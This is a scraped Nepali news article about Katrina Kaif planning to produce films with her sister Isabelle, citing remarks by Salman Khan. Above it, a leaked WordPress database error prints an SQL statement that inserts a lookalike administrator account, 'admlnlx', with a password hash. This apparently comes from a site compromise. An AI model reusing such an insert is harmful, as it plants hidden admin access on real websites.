WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfndYF88gRsxtVosCQUioPmL0ppZTJ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 11:29:17', '', 'admlnlx', 'admlnlx')
मुम्बइ, फागुन २-
बलिउड नायिका प्रियंका चोपडा, अनुष्का शर्मा फिल्म निर्माणमा कस्सिरहेका बेला अर्की नायिका कट्रिना कैफ पनि निर्मात्री बन्ने भएकी छन् । कट्रिनाले आफ्नै बहिनी इशाबेलसँग मिलेर फिल्म बनाउन लागेको नायक सलमान खानले हालै खुलासा गरेका छन् ।
बेलायतमा मोडलिङसमेत गर्दै आएकी नायिका इशाबेललाई सलमानले भारत ल्याएर निर्माणमा लन्च गर्न खोजेको हालै हल्ला फैलिएपछि सलमानले आफूले तत्कालै त्यस्तो कुनै योजना नबनाएको जनाउँदै भने, ‘बरु कट्रिनाले आफ्नै ब्यानरमार्फत बहिनीसँगै एकसाथ डेब्यु गर्न लागेकी छन् ।’
कट्रिनाले पूर्वप्रेमी सलमानसँग लामो छलफलपछि फिल्म निर्माणमा बहिनीसँगै हात हाल्न लागेको बताइएको छ । कट्रिनालाई बलिउड ब्रेक दिन पनि सलमानकै ठूलो हात थियो । ‘उनले छिट्टै नै फिल्म निर्माण गर्दै छिन् । अहिले स्क्रिप्ट अध्ययनमा लागेकी छन् । आफ्ना नजिकका निर्देशकहरूसँग नियमित भेटघाटमा पनि छिन्,’ सलमानले कट्रिनाका बारेमा खुलासा गर्दै थपे, ‘यदि कोहीले इशाबेललाई बलिउड प्रोडक्सनबाट लन्च गर्दै छ भने त्यो उनकै दिदी कट्रिना आफैं हुन् ।’
३३ वर्षीया कट्रिनाले बहिनीलाई समेत निर्माणमा ल्याउनेबारे अहिले नै ठोस काम केही भईनसके पनि आफूले भने छिट्टै फिल्म निर्माण गर्ने स्पष्ट पारिन् । -एजेन्सी